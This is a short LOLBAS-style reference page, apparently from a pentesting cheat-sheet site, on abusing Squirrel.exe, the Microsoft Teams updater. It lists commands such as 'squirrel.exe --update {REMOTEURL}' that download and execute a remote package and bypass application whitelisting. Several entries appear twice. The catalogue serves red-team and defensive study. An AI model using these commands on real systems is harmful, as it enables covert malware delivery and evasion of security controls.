🐚 GTFOBins πŸͺŸ LOLBAS πŸ’Ύ Compiled Binaries 🩸 BloodHound 🩸 bloodyAD πŸ“œ Certipy ☁️ Cloud ⚑ goexec πŸ€– HackTricks πŸ”Œ HardwareATT πŸ“¦ Impacket 🏰 InternalATT πŸ”€ Ligolo-ng 🐱 Mimikatz πŸ’£ msfvenom πŸ”§ NetExec πŸ€– OSAI πŸ’₯ PATT 🍳 Recipes 🎟️ Rubeus 🐍 Sliver
πŸͺŸ LOLBAS / Squirrel.exe

Squirrel.exe

Binary to update the existing installed Nuget/squirrel package. Part of Microsoft Teams installation.

AWL Bypass

Download and execute binary

squirrel.exe --update {REMOTEURL}

The above binary will go to url and look for RELEASES file, download and install the nuget package. — MITRE: T1218 — Privileges: User

Download and execute binary

squirrel.exe --updateRollback={REMOTEURL}

The above binary will go to url and look for RELEASES file, download and install the nuget package. — MITRE: T1218 — Privileges: User

Download

Download binary

squirrel.exe --download {REMOTEURL}

The above binary will go to url and look for RELEASES file and download the nuget package. — MITRE: T1218 — Privileges: User

Execute

Download and execute binary

squirrel.exe --update {REMOTEURL}

The above binary will go to url and look for RELEASES file, download and install the nuget package. — MITRE: T1218 — Privileges: User

Download and execute binary

squirrel.exe --updateRollback={REMOTEURL}

The above binary will go to url and look for RELEASES file, download and install the nuget package. — MITRE: T1218 — Privileges: User